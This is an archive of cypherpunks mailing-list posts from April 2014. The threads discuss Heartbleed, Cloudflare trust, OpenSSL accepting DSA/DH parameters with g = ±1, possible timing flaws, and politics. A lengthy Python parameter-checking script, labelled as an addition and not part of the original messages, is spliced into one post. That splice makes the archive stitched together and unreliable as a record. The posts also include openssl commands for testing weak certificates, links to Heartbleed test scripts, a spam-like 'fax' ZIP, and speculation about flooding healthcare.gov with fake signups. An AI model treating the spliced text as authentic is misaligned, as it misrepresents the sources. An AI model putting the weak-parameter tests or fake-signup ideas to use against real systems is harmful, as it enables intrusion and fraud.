> On Sun, Apr 6, 2014 at 5:28 PM, Ryan Carboni wrote:
>
>> oh dear.
>> He helped the government combat crime and nuisance style offenses.
>> Clearly in collusion.
>>
>> On Sun, Apr 6, 2014 at 12:20 PM, wrote:
>>
>>> > Message of 06/04/14 17:41
>>> > From: "staticsafe"
>>> > On 4/6/2014 10:40, tpb-crypto at laposte.net wrote:
>>> > >> Message of 04/04/14 20:09
>>> > >> From: "Eric Mill"
>>> > >> Along with Cloudflare's 2014 plan to offer SSL termination for
>>> free, and
>>> > >> their stated plan to double SSL on the Internet by end of year, the
>>> barrier
>>> > >> to HTTPS everywhere is dropping rapidly.
>>> > >>
>>> > >
>>> > > I agree that putting https everywhere is great, but Cloudflare's
>>> founders are tightly linked with the US-intelligence community. That fact
>>> alone kind of kills any claims they make about data security within their
>>> service.
>>> >
>>> > Source for this please?
>>> >
>>>
>>> Is it so painful to do your own homework?
>>>
>>> "Matthew Prince, Lee Holloway, and Michelle Zatlyn created CloudFlare in
>>> 2009.[1][2] They previously worked on Project Honey Pot." -
>>> http://en.wikipedia.org/wiki/CloudFlare
>>>
>>> "[...] the project organizers also help various law enforcement agencies
>>> combat private and commercial unsolicited bulk mailing offenses and overall
>>> work to help reduce the amount of spam being sent [...]" -
>>> http://en.wikipedia.org/wiki/Project_Honey_Pot
>>>
>>> That's just for starters, you can dig more and find more. It is
>>> interesting that the history of the founders themselves is no longer
>>> exhibited in cloudflare.com website as it was years ago.
>>>
>>>
>>> As an American company, there is nothing preventing Cloudflare from
>>> receiving NSLs and having to shut up about them. What use is a system that
>>> you can't trust like this?
>>>
>>> You can say "oh, but they go after the bad guys, spammers". But that
>>> doesn't limit it to spammers neither do we know who are the so called bad
>>> guys, since that is decided by American secret laws, made by secret courts,
>>> that issue secret orders.
>>>
>>> No trust to American companies, less even trust to American companies
>>> that promise any kind of data security. Better no security than a false
>>> sense of it.
>>>
>>> Sorry.
>>> _______________________________________________
>>> cryptography mailing list
>>> cryptography at randombit.net
>>> http://lists.randombit.net/mailman/listinfo/cryptography
>>>
>>
>>
>> _______________________________________________
>> cryptography mailing list
>> cryptography at randombit.net
>> http://lists.randombit.net/mailman/listinfo/cryptography
>>
>>
>
> _______________________________________________
> cryptography mailing list
> cryptography at randombit.net
> http://lists.randombit.net/mailman/listinfo/cryptography
>
>

--
konklone.com | @konklone
From grarpamp at gmail.com Tue Apr 8 00:22:17 2014
From: grarpamp at gmail.com (grarpamp)
Date: Tue, 8 Apr 2014 03:22:17 -0400
Subject: Meanwhile as the internet reboots...
Message-ID:

Depending on your looking glass, at around 20:30UTC one particular system (the Tor network, ~5300 nodes) had a cumulative uptime of about 14.05Gsec. It's dropped by about 6.5% so far. This bug should make for some interesting infrastructure analysis across a variety of systems.

http://heartbleed.com/

From guninski at guninski.com Tue Apr 8 02:23:24 2014
From: guninski at guninski.com (Georgi Guninski)
Date: Tue, 8 Apr 2014 12:23:24 +0300
Subject: Should openssl accept weak DSA/DH keys with g = +/- 1 ?
Message-ID: <20140408092323.GA11169@sivokote.iziade.m$>

I am a noob at crypto.

IIRC similar attack was used against Tor several years ago.

In DSA it is possible to force g=1 or g \equiv -1 \mod p. The first is unit and the second is of multiplicative order 2. These are clearly weak and insane choices, but this might have implications to MITM (might be wrong on this).

For DH could generate key with g=1, though couldn't test it.

Tested both 1 and -1 cases in DSA, the probability of successful connection was about 1/4 (or maybe 1/2), errors in the other cases. (for $1$ I would expect probability $1$).

Attached are cacert.pem and cacert2.pem, the magic word is 1234.

To test:

$ openssl s_server -accept 8888 -www -cert cacert.pem
$ openssl s_client -connect localhost:8888 -showcerts

To examine:

$ openssl x509 -text -in cacert2.pem
$ openssl dhparam -text -in dHParam.pem

(not sure if this dHParam.pem is usable, forged generation).

Firefox refuses connections, Konqueror works with same probability.

Suspect this might be related to EC refusing the point at infinity.

Might have MITM implications, don't have working exploit (If a MITM can forge $g=1$ in DH, the private keys are useless).
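A defender-side check for the degenerate parameters the post describes, written as an added example (it is not part of Guninski's message and is not OpenSSL code): it parses the dHParam.pem attached to the post with a minimal DER reader and applies the range and subgroup tests that reject g = 1 and g = p - 1, together with the matching public-value check a peer should run on what it receives. The function names are my own, and the p = 23, q = 11 group is constructed for illustration.

```python
"""Domain-parameter checks for the DH/DSA g = +1 / g = -1 case.

Added example (not part of Georgi Guninski's post, and not OpenSSL code).
It reads the "DH PARAMETERS" attachment from that post, extracts p and g
with a minimal DER reader (a PKCS#3 DHParameter is SEQUENCE { INTEGER p,
INTEGER g }), and applies the generator and public-value checks that reject
the degenerate cases.  The toy values p = 23, q = 11 are constructed here
to make the collapse of the public-value space visible by hand.
"""
import base64

# Attachment dHParam.pem from the post (copied verbatim from the message).
DH_PEM = """-----BEGIN DH PARAMETERS-----
MIGHAoGBAOnh7CKkyZlo8RdK7m4IL085MUpVxBeKrArx7kJZp8/3ctjEli2m5U32
GuwUBYmi5t65ChuOOc+nTQiTYwsoviPJnhM0uxPz3Hu5wtlJtBQQNoOwKvK7RwHS
JOs/JhVBjL+VErMe90QbW77wmtZWx9KzDY/O9kYGtzT/37AGP32TAgEB
-----END DH PARAMETERS-----"""


def pem_to_der(pem: str) -> bytes:
    """Strip the PEM armour lines and base64-decode the body."""
    body = "".join(line.strip() for line in pem.splitlines()
                   if line.strip() and not line.startswith("-----"))
    return base64.b64decode(body)


def read_tlv(buf: bytes, pos: int):
    """Decode one DER tag-length-value at pos; return (tag, value, next_pos)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                     # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def parse_dh_params(pem: str):
    """Return (p, g) from a PKCS#3 DHParameter PEM blob."""
    der = pem_to_der(pem)
    tag, seq, _ = read_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("expected SEQUENCE")
    tag_p, p_bytes, pos = read_tlv(seq, 0)
    tag_g, g_bytes, _ = read_tlv(seq, pos)
    if tag_p != 0x02 or tag_g != 0x02:
        raise ValueError("expected two INTEGERs")
    return int.from_bytes(p_bytes, "big"), int.from_bytes(g_bytes, "big")


def check_generator(p: int, g: int, q: int = None) -> list:
    """Return the reasons (p, g[, q]) are unsafe; an empty list means they pass.

    The range check is what catches the post's g = 1 (unit) and g = p - 1
    (order 2).  When q is known, the subgroup test is the stronger check
    that g really lies in the order-q subgroup.
    """
    problems = []
    if p < 5 or p % 2 == 0:
        problems.append("p is not an odd prime candidate > 3")
    if g < 2 or g > p - 2:
        problems.append("g outside [2, p-2]: g = 1 or g = p-1 gives a subgroup of order 1 or 2")
    elif q is not None:
        if q < 2 or (p - 1) % q != 0:
            problems.append("q does not divide p-1")
        elif pow(g, q, p) != 1:
            problems.append("g^q mod p != 1: g does not lie in the order-q subgroup")
    return problems


def check_public_value(p: int, y: int, q: int = None) -> list:
    """Validate a peer's public value y = g^x mod p before using it.

    Rejecting y = 1 and y = p-1 means a peer cannot steer the shared
    secret into {1, p-1} even if it sent bogus parameters.
    """
    problems = []
    if y < 2 or y > p - 2:
        problems.append("public value outside [2, p-2]")
    elif q is not None and pow(y, q, p) != 1:
        problems.append("public value not in the order-q subgroup")
    return problems


def public_value_space(p: int, g: int) -> set:
    """All distinct g^x mod p for private exponents 1..p-1 (toy sizes only)."""
    return {pow(g, x, p) for x in range(1, p)}


if __name__ == "__main__":
    p, g = parse_dh_params(DH_PEM)
    print("attached dHParam.pem: p is %d bits, g = %d" % (p.bit_length(), g))
    print("checks:", check_generator(p, g) or "ok")
    # Constructed toy group: p = 23 = 2*11 + 1, and g = 2 has order 11.
    for toy_g in (1, 22, 2):
        print("p=23 g=%2d -> %d possible public values, checks: %s"
              % (toy_g, len(public_value_space(23, toy_g)),
                 check_generator(23, toy_g, 11) or "ok"))
```

Run stand-alone, it reports that the attached DH parameters carry a 1024-bit p with g = 1, which the range check rejects. In the toy group, g = 1 leaves a single possible public value and g = p - 1 leaves two (1 or p - 1, depending on the parity of the private exponent), so the shared secret is guessable without the private key; g = 2 yields the full order-11 subgroup. The same two tests (g in [2, p-2] and, when q is known, g^q mod p == 1) are what a DSA or DH implementation should apply to parameters it receives from a peer or a certificate before trusting them.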
-------------- next part -------------- [PEM attachment omitted: encrypted DSA private key and certificate] -------------- next part -------------- [PEM attachment omitted: encrypted private key and certificate] -------------- next part -------------- [PEM attachment omitted: DH parameters] From guninski at guninski.com Tue Apr 8 03:49:35 2014 From: guninski at guninski.com (Georgi
Guninski) Date: Tue, 8 Apr 2014 13:49:35 +0300 Subject: Should openssl accept weak DSA/DH keys with g = +/- 1 ? In-Reply-To: <20140408092323.GA11169@sivokote.iziade.m$> References: <20140408092323.GA11169@sivokote.iziade.m$> Message-ID: <20140408104935.GC11169@sivokote.iziade.m$> On Tue, Apr 08, 2014 at 12:23:24PM +0300, Georgi Guninski wrote: > other cases. (for $1$ I would expect probability > $1$). This was mistake, both certs had g= -1. With g=1 probability is $1$ in openssl and Konqueror. cacert3.pem is with g=1. > -------------- next part -------------- [PEM attachment omitted: encrypted private key and certificate for cacert3.pem] From eric at konklone.com Tue Apr 8 11:04:58 2014 From: eric at konklone.com (Eric Mill) Date: Tue, 8 Apr 2014 14:04:58 -0400 Subject: [Cryptography] [cryptography] Github Pages now supports SSL In-Reply-To:
<20140408025433.9A00B11E4D@a-pb-sasl-quonix.pobox.com> References: <20140408025433.9A00B11E4D@a-pb-sasl-quonix.pobox.com> Message-ID: Yeah, it's real terrific. -_____- @ITechGeek, my understanding was that SNI was handled at an OS level by WinXP, and no browser would work on it. I could be wrong, I haven't researched it myself. On Mon, Apr 7, 2014 at 10:31 PM, Bill Stewart wrote: > At 11:08 AM 4/4/2014, Eric Mill wrote: > >> I know most of the people on here have transcended the earthbound, >> maudlin Certificate Authority system, but as services-adopting-SSL-news >> goes, I'm particular excited about > 444555263195217920>Github Pages, which started quietly supporting SSL >> for *.github.io domains a few weeks back. >> > > Well that was convenient timing, considering the OpenSSL "Change All Your > Certs and Keys Now" bug announcement that just hit the wires :-) > > _______________________________________________ > The cryptography mailing list > cryptography at metzdowd.com > http://www.metzdowd.com/mailman/listinfo/cryptography > -- konklone.com | @konklone -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2038 bytes Desc: not available URL: From dal at riseup.net Tue Apr 8 12:54:04 2014 From: dal at riseup.net (Douglas Lucas) Date: Tue, 08 Apr 2014 14:54:04 -0500 Subject: How we get there Re: Geoff Stone, Obama's Review Group In-Reply-To: <533F151F.6020801@cpunk.us> References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DBDDD.8050102@cpunk.us> <533DD10D.8090005@cpunk.us> <533EC0B6.6030500@loom.cc> <533F151F.6020801@cpunk.us> Message-ID: <534453DC.6060608@riseup.net> The book Binding Chaos by Heather Marsh, who ran WikiLeaks Central from 2010 to 2012, describes a system for governance using the Internet as a mass collaboration tool. 
Free, full text PDFs available from the landing page: http://georgiebc.wordpress.com/2013/05/24/binding-chaos/ The book describes using stigmergy for work, rather than time-wasting consensus or coercive hierarchy, approval economy instead of a financial system, control by user groups rather than democracy, and more. Douglas On 04/04/2014 03:25 PM, Cypher wrote: > On 04/04/2014 09:24 AM, Patrick Chkoreff wrote: >> Cypher wrote, On 04/03/2014 05:22 PM: > >>> But, please, instead of ranting and wild arm-waving, educate me >>> if I am wrong. I would certainly /love/ to see a workable, large >>> scale, anarchistic plan. > >> Please, no large scale plans, I beg you. I simply wish to see the >> emergent effects of countless individuals interacting with each >> other solely on the basis of mutual consent. That is all. > > Good response, Patrick. But how do you think we're going to get to > that? Without concerted action, and it has to be more than everybody > doing their own thing IMHO, how will that goal be achieved? I hear a > lot of anarchists saying what you say and it's a fantastic goal. But > how do we get there? > > From grarpamp at gmail.com Tue Apr 8 14:25:38 2014 From: grarpamp at gmail.com (grarpamp) Date: Tue, 8 Apr 2014 17:25:38 -0400 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <53443999.2090906@gmx.com> References: <53443999.2090906@gmx.com> Message-ID: On Tue, Apr 8, 2014 at 2:02 PM, Joe Btfsplk wrote: >> On 4/7/2014 6:14 PM, grarpamp wrote: >> http://heartbleed.com/ >> Patch your stuff. > Comments / suggestions from those w/ in depth knowledge in this area? How > users should proceed; how to check if sites used (banks, email, retail > sites, etc.) were / still are affected, so one knows if & when to change > passwords or other data? 
> > If the number of sites potentially affected is as large as indicated on > heartbleed.com, changing PW on even 60% of sites I use could take a long > time - even to do it once. > > It would do little good to change a password on a site that hasn't patched > this. > Or perhaps it would do some good, to change the password before logging out > of a site? Then when a site must be accessed again, change the password > again. > > Either way, this might not provide perfect safety, but might ? be better > than nothing. https://blog.torproject.org/ covers what to do for Tor things. For everything else on the net, fix the clients and servers you're responsible for. Then... You're right, there's a big gotcha in all this, users won't really know if the services they interact with have been fixed [1] because huge swaths of services simply don't publish what they do on their pages, they bury it to keep quiet and shiny happy sites. Only some banks, insurers, utilities, schools, etc will post "we're fixed" anywhere remotely prominent. So you have to trust they did [2], which is a reasonable assumption given regulation and liability of big institutional services. You should already have a regular password changing/logout/session management regimen, so inserting some extra instances of that along guesstimates of [2] should suffice with these classes of service. [2] Sometime during the falloff curve starting yesterday afternoon. The real user risk is likely on mid to small services, embedded things, shared platforms, legacy systems, services that didn't get the news, don't have the resources or knowledge to fix, etc. Again, consider some form of reasonable regimen. And there are all sorts of tools and site testing services coming out now for which a brave user might be completely warranted in using to determine [1 above] so they know when to utilize [regimen 2]. 
(Far better to use a testing service or email their help desks seeking a positive statement than risk being potentially considered an exploiter of things you don't own.)

Partial list...

http://s3.jspenguin.org/ssltest.py
https://gist.github.com/takeshixx/10107280
https://github.com/FiloSottile/Heartbleed
https://www.ssllabs.com/ssltest/index.html

(Note, this is a TLS in-process bug, so more than HTTP/S services are affected...)

This bug will no doubt trigger some thinking, analysis and change in the services, security, infrastructure and user communities... that's a good thing.

From carimachet at gmail.com Tue Apr 8 16:13:38 2014 From: carimachet at gmail.com (Cari Machet) Date: Tue, 8 Apr 2014 23:13:38 +0000 Subject: How we get there Re: Geoff Stone, Obama's Review Group In-Reply-To: <534453DC.6060608@riseup.net> References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DBDDD.8050102@cpunk.us> <533DD10D.8090005@cpunk.us> <533EC0B6.6030500@loom.cc> <533F151F.6020801@cpunk.us> <534453DC.6060608@riseup.net> Message-ID: i do need to read it but at face value - or what u pulled out - consensus is not a problem regarding time wasting - as the ideas of efficiency are capitalistic and massively overblown + often what seems efficient is just short term problem solving - leaving huge gaps for people to have to deal with later - the big problem with consensus is mob rule - just like the problem we have with supposed democracy in the representative manner prolific now On Tue, Apr 8, 2014 at 7:54 PM, Douglas Lucas wrote: > The book Binding Chaos by Heather Marsh, who ran WikiLeaks Central from > 2010 to 2012, describes a system for governance using the Internet as a > mass collaboration tool.
Free, full text PDFs available from the landing > page: http://georgiebc.wordpress.com/2013/05/24/binding-chaos/ > > The book describes using stigmergy for work, rather than time-wasting > consensus or coercive hierarchy, approval economy instead of a financial > system, control by user groups rather than democracy, and more. > > Douglas > > On 04/04/2014 03:25 PM, Cypher wrote: > > On 04/04/2014 09:24 AM, Patrick Chkoreff wrote: > >> Cypher wrote, On 04/03/2014 05:22 PM: > > > >>> But, please, instead of ranting and wild arm-waving, educate me > >>> if I am wrong. I would certainly /love/ to see a workable, large > >>> scale, anarchistic plan. > > > >> Please, no large scale plans, I beg you. I simply wish to see the > >> emergent effects of countless individuals interacting with each > >> other solely on the basis of mutual consent. That is all. > > > > Good response, Patrick. But how do you think we're going to get to > > that? Without concerted action, and it has to be more than everybody > > doing their own thing IMHO, how will that goal be achieved? I hear a > > lot of anarchists saying what you say and it's a fantastic goal. But > > how do we get there? > > > > > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... 
Name: not available Type: text/html Size: 3279 bytes Desc: not available URL: From jamesdbell9 at yahoo.com Tue Apr 8 23:25:12 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Tue, 8 Apr 2014 23:25:12 -0700 (PDT) Subject: Passwords problem Message-ID: <1397024712.68961.YahooMailNeo@web126203.mail.ne1.yahoo.com> http://news.yahoo.com/passwords-vulnerable-security-flaw-found-222708914.html Passwords vulnerable after security flaw found By ANICK JESDANUN 6 hours ago NEW YORK (AP) — Passwords, credit cards and other sensitive data are at risk after security researchers discovered a problem with an encryption technology used to securely transmit email, e-commerce transactions, social networking posts and other Web traffic. Security researchers say the threat, known as Heartbleed, is serious, partly because it remained undiscovered for more than two years. Attackers can exploit the vulnerability without leaving any trace, so anything sent during that time has potentially been compromised. It's not known, though, whether anyone has actually used it to conduct an attack. Researchers are advising people to change all of their passwords. The flaw was discovered independently in recent days by researchers at Google Inc. and the Finnish security firm Codenomicon. The breach involves SSL/TLS, an encryption technology marked by the small, closed padlock and "https:" on Web browsers to signify that traffic is secure. With the Heartbleed flaw, traffic was subject to snooping even if the padlock had been closed.
The problem affects only the variant of SSL/TLS known as OpenSSL, but that happens to be one of the most common on the Internet. Researchers at Codenomicon say that OpenSSL is used by two of the most widely used Web server software, Apache and nginx. That means many websites potentially have this security flaw. OpenSSL is also used to secure email, chats and virtual private networks, which are used by employees to connect securely with corporate networks. Despite the worries, Codenomicon said many large consumer sites don't have the problem because of their "conservative choice" of equipment and software. "Ironically smaller and more progressive services or those who have upgraded to (the) latest and best encryption will be affected most," the security firm added. A fix came out Monday, but affected websites and service providers must install the update. Yahoo's Tumblr blogging service uses OpenSSL. In a blog post Tuesday, officials at the service said they had no evidence of any breach and had immediately implemented the fix. "But this still means that the little lock icon (HTTPS) we all trusted to keep our passwords, personal emails, and credit cards safe, was actually making all that private information accessible to anyone who knew about the exploit," Tumblr's blog post read. "This might be a good day to call in sick and take some time to change your passwords everywhere — especially your high-security services like email, file storage, and banking, which may have been compromised by this bug." Yahoo Inc. said its other services, including email, Flickr and search, also have the vulnerability. The company said some of the systems have already been fixed, while work is being done on the rest of Yahoo's websites. The company reiterated its standard recommendation for people to change passwords regularly and to add a backup mobile number to the account. 
That number can be used to verify a user's identity if there are problems accessing the account because of hacking. ___ AP Technology Writer Michael Liedtke in San Francisco contributed to this report. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 28321 bytes Desc: not available URL: From jamesdbell9 at yahoo.com Tue Apr 8 23:36:31 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Tue, 8 Apr 2014 23:36:31 -0700 (PDT) Subject: healthcare.gov vulnerability? Message-ID: <1397025391.88329.YahooMailNeo@web126205.mail.ne1.yahoo.com> It occurred to me that I haven't heard much on the news about deliberate attacks on the healthcare.gov website, even though it is reputed to be extremely weak.  Might somebody (potentially a supporter of Obama and/or Obamacare) have deliberately 'spammed' it with fake signups, simply to get the number of such signups increased?  How vulnerable would it be to 'invented' names/addresses?  How 'valid' would these names/addresses have to be to keep the system from finding out until some arbitrary stage in the process?  If such an attack had been done, would the public ever find out, and when?         Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 835 bytes Desc: not available URL: From demonfighter at gmail.com Wed Apr 9 05:36:09 2014 From: demonfighter at gmail.com (Steve Furlong) Date: Wed, 9 Apr 2014 08:36:09 -0400 Subject: healthcare.gov vulnerability? In-Reply-To: <1397025391.88329.YahooMailNeo@web126205.mail.ne1.yahoo.com> References: <1397025391.88329.YahooMailNeo@web126205.mail.ne1.yahoo.com> Message-ID: On Wed, Apr 9, 2014 at 2:36 AM, jim bell wrote: > Might somebody (potentially a supporter of Obama and/or Obamacare) have > deliberately 'spammed' it with fake signups, simply to get the number of > such signups increased? Possible, I suppose, but why bother? 
They could just make up numbers and they'd be repeated as gospel by the lapdogs, lickspittles, and fellow travellers. ref practically every other number coming from the US federal and state governments. -- Neca eos omnes. Deus suos agnoscet. -- Arnaud-Amaury, 1209 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 999 bytes Desc: not available URL: From jamesdbell9 at yahoo.com Wed Apr 9 10:29:19 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Wed, 9 Apr 2014 10:29:19 -0700 (PDT) Subject: healthcare.gov vulnerability? In-Reply-To: References: <1397025391.88329.YahooMailNeo@web126205.mail.ne1.yahoo.com> Message-ID: <1397064559.25249.YahooMailNeo@web126204.mail.ne1.yahoo.com> From: Steve Furlong On Wed, Apr 9, 2014 at 2:36 AM, jim bell wrote: >> Might somebody (potentially a supporter of Obama and/or Obamacare) have >> deliberately 'spammed' it with fake signups, simply to get the number of >> such signups increased? > Possible, I suppose, but why bother? They could just make up numbers and they'd be repeated as gospel by the > lapdogs, lickspittles, and fellow travellers. ref practically every other number coming from the US federal and > state governments. True, but I think they'd prefer to (later on) be able to blame some unknown-named and unidentifiable 'hacker-types' than to implicate themselves. ("I'm shocked, shocked to find that gambling is going on in here!") This tactic wouldn't be useful at all if follow-on data (like actually-paid accounts) were released. Probably this explains why those numbers remain elusive even today. Jim Bell -------------- next part -------------- A non-text attachment was scrubbed...
Name: not available Type: text/html Size: 3715 bytes Desc: not available URL: From Administrator at jfet.org Wed Apr 9 10:36:23 2014 From: Administrator at jfet.org (Administrator) Date: Wed, 9 Apr 2014 12:36:23 -0500 Subject: New Fax: 4 pages Message-ID: Scanned from MFP47815156 by jfet.org Date: Wed, 9 Apr 2014 12:36:23 -0500 Pages: 4 Resolution: 200x200 DPI ---------------------------------------- -------------- next part -------------- A non-text attachment was scrubbed... Name: Scan-510047.ZIP Type: application/zip Size: 6364 bytes Desc: not available URL: From lists at silent1.net Wed Apr 9 15:34:15 2014 From: lists at silent1.net (Silent1) Date: Wed, 9 Apr 2014 23:34:15 +0100 Subject: healthcare.gov vulnerability? In-Reply-To: <1397064559.25249.YahooMailNeo@web126204.mail.ne1.yahoo.com> References: <1397025391.88329.YahooMailNeo@web126205.mail.ne1.yahoo.com> <1397064559.25249.YahooMailNeo@web126204.mail.ne1.yahoo.com> Message-ID: <000701cf5443$d6a42f60$83ec8e20$@net> If they at some later stage got found out to have massaged the data they would just blame it on some office intern who would then be fired and claim it was a statistical fault. Politicians only get to where they are by lying, blaming others for their failures, being able to gaslight the public and being able to perform a complete u-turn on a subject and flat out deny to your face that they had done so. Many people forget that politicians have no spine, morals or inclination to tell the truth, especially when the opposite will assist their position. I have no experience of the system, but is it possible to sign a family up with one session? Because I can see them easily adjusting it so instead of one signup they've got 5 etc. From: cypherpunks [mailto:cypherpunks-bounces at cpunks.org] On Behalf Of jim bell Sent: Wednesday, April 09, 2014 6:29 PM To: Steve Furlong Cc: cypherpunks at cpunks.org Subject: Re: healthcare.gov vulnerability?
From: Steve Furlong On Wed, Apr 9, 2014 at 2:36 AM, jim bell wrote: >> Might somebody (potentially a supporter of Obama and/or Obamacare) have >> deliberately 'spammed' it with fake signups, simply to get the number of >> such signups increased? > Possible, I suppose, but why bother? They could just make up numbers and they'd be repeated as gospel by the > lapdogs, lickspittles, and fellow travellers. ref practically every other number coming from the US federal and > state governments. True, but I think they'd prefer to (later on) be able to blame some unknown-named and unidentifiable 'hacker-types' than to implicate themselves. ("I'm shocked, shocked to find that gambling is going on in here!") This tactic wouldn't be useful at all if follow-on data (like actually-paid accounts) were released. Probably this explains why those numbers remain elusive even today. Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 7389 bytes Desc: not available URL: From cypher at cpunk.us Thu Apr 10 00:02:24 2014 From: cypher at cpunk.us (Cypher) Date: Thu, 10 Apr 2014 02:02:24 -0500 Subject: NSA good guys Message-ID: I wonder how long the good but misunderstood people over at NSA knew about Heartbleed and didn't disclose? I mean, certainly "protecting" us would necessitate them coming forward, right? They wouldn't deliberately leave the entire country vulnerable just so they could keep spying, right? Good people, my ass. Cypher Sent from my mobile device From grarpamp at gmail.com Thu Apr 10 00:46:44 2014 From: grarpamp at gmail.com (grarpamp) Date: Thu, 10 Apr 2014 03:46:44 -0400 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <5345917F.3000700@comcast.net> References: <53443999.2090906@gmx.com> <53447721.9070209@gmx.com> <53457BE8.4020500@gmx.com> <5345917F.3000700@comcast.net> Message-ID: On Wed, Apr 9, 2014 at 2:29 PM, Christopher J.
Walters
> > It makes me wonder if the NSA was involved in inserting this bug into
> OpenSSL clients and servers.

That would be 2+ years of amazing win on NSA part [1]. Any unlikely impropriety would come out soon. More likely reality... opensource people are busy and good humans and coding mistakes happen.

Hopefully the general buzz around NSA/security/crypto/decentral will result in dedicating more permanent resource to things like protocol devel and replacements, and auditing of key underlying software code.

You really need to be asking if and how the giant for-profit corps that use opensource for free are giving back. $50k a year donated to fund an independent developer pool from the OSS community to sit on the teams of your favorite code projects of choice as auditors is nothing to companies like that, a dream gig for the dev, a win for the project, and good company PR.

How often do you see @ge.com @chase.com @ibm.com, etc on developer/donation lists... you need to ask those type of @'s if, how, and why not.

[1] And pretty dumb of any attacker to not simply quietly watch, analyse and exploit the committed output of any critical project... no insertion, cost, or risk necessary to do that.

From peter at petermalone.org Thu Apr 10 03:40:38 2014
From: peter at petermalone.org (Peter Malone)
Date: Thu, 10 Apr 2014 06:40:38 -0400
Subject: Two possible vulnerabilities in OpenSSL?
Message-ID: <1397126438.1729.11.camel@shire>

Hey there,

I was auditing OpenSSL last night. I looked at several files and found the following:

https://github.com/openssl/openssl/blob/master/ssl/t1_lib.c#L2893

    /* Determine if we need to see RI. Strictly speaking if we want to
     * avoid an attack we should *always* see RI even on initial server
     * hello because the client doesn't see any renegotiation during an
     * attack. However this would mean we could not connect to any server
     * which doesn't support RI so for the immediate future tolerate RI
     * absence on initial connect only.
     */

Well that's awful coding.

Unless I'm mistaken, the following memcmp is vulnerable to a remote timing attack.

https://github.com/openssl/openssl/blob/master/ssl/ssl_lib.c#L1974

    static int ssl_session_cmp(const SSL_SESSION *a, const SSL_SESSION *b)
    {
        if (a->ssl_version != b->ssl_version)
            return(1);
        if (a->session_id_length != b->session_id_length)
            return(1);
        return(memcmp(a->session_id, b->session_id, a->session_id_length));
    }

I posted both of these findings to the full disclosure list last night. I figured someone on this list might find it interesting as well.

Cheers,
Peter.

From cathalgarvey at cathalgarvey.me Thu Apr 10 03:34:00 2014
From: cathalgarvey at cathalgarvey.me (Cathal Garvey)
Date: Thu, 10 Apr 2014 11:34:00 +0100
Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL
In-Reply-To:
References: <53443999.2090906@gmx.com> <53447721.9070209@gmx.com> <53457BE8.4020500@gmx.com> <5345917F.3000700@comcast.net>
Message-ID: <53467398.70004@cathalgarvey.me>

> More likely reality... opensource
> people are busy and good humans and coding mistakes happen.

Given that other likely backdoors were also concealed as "mistakes" in normal commits, I wouldn't write it off. But the real villain here is coding security-critical applications in C, when there are memory-safe, more modern alternatives. The Heartbleed bug-door was a failed memory-bounds check, but that's something more modern alternatives just do automatically as a matter of course. If I recall correctly, Rust was designed explicitly to be memory safe. D is likewise memory safe, and is syntactically close enough to C that an OpenSSL rewrite isn't out of the question.

On 10/04/14 08:46, grarpamp wrote:
> On Wed, Apr 9, 2014 at 2:29 PM, Christopher J. Walters
>
>> It makes me wonder if the NSA was involved in inserting this bug into
>> OpenSSL clients and servers.
>
> That would be 2+ years of amazing win on NSA part [1]. Any unlikely
> impropriety would come out soon.
More likely reality... opensource > people are busy and good humans and coding mistakes happen. > Hopefully the general buzz around NSA/security/crypto/decentral will > result in dedicating more permanent resource to things like protocol devel > and replacements, and auditing of key underlying software code. > You really need to be asking if and how the giant for-profit corps > that use opensource for free are giving back. $50k a year donated to > fund an independent developer pool from the OSS community to sit on > the teams of your favorite code projects of choice as auditors is nothing > to companies like that, a dream gig for the dev, a win for the project, and > good company PR. > > How often do you see @ge.com @chase.com @ibm.com, etc > on developer/donation lists... you need to ask those type of > @'s if, how, and why not. > > [1] And pretty dumb of any attacker to not simply quietly watch, > analyse and exploit the committed output of any critical project... > no insertion, cost, or risk necessary to do that. > -- T: @onetruecathal, @IndieBBDNA P: +353876363185 W: http://indiebiotech.com -------------- next part -------------- A non-text attachment was scrubbed... Name: 0x988B9099.asc Type: application/pgp-keys Size: 6176 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 901 bytes Desc: OpenPGP digital signature URL: From tedks at riseup.net Thu Apr 10 10:23:50 2014 From: tedks at riseup.net (Ted Smith) Date: Thu, 10 Apr 2014 13:23:50 -0400 Subject: NSA good guys In-Reply-To: <534691BD.1060904@cathalgarvey.me> References: <534691BD.1060904@cathalgarvey.me> Message-ID: <1397150630.11670.2.camel@anglachel> On Thu, 2014-04-10 at 13:42 +0100, Cathal Garvey wrote: > Anyone have details on whether Lavabit was vulnerable? Because that'd > beg the question; why ask nicely?
Even if the FBI knew about Heartbleed, they'd presumably want to use the
evidence they gathered from Lavabit to prosecute a case in an open court.
They couldn't use illegally gathered evidence in a criminal trial.

The NSA and CIA, on the other hand, are military rather than civilian.
They don't have to have trials. They have Guantanamo instead.

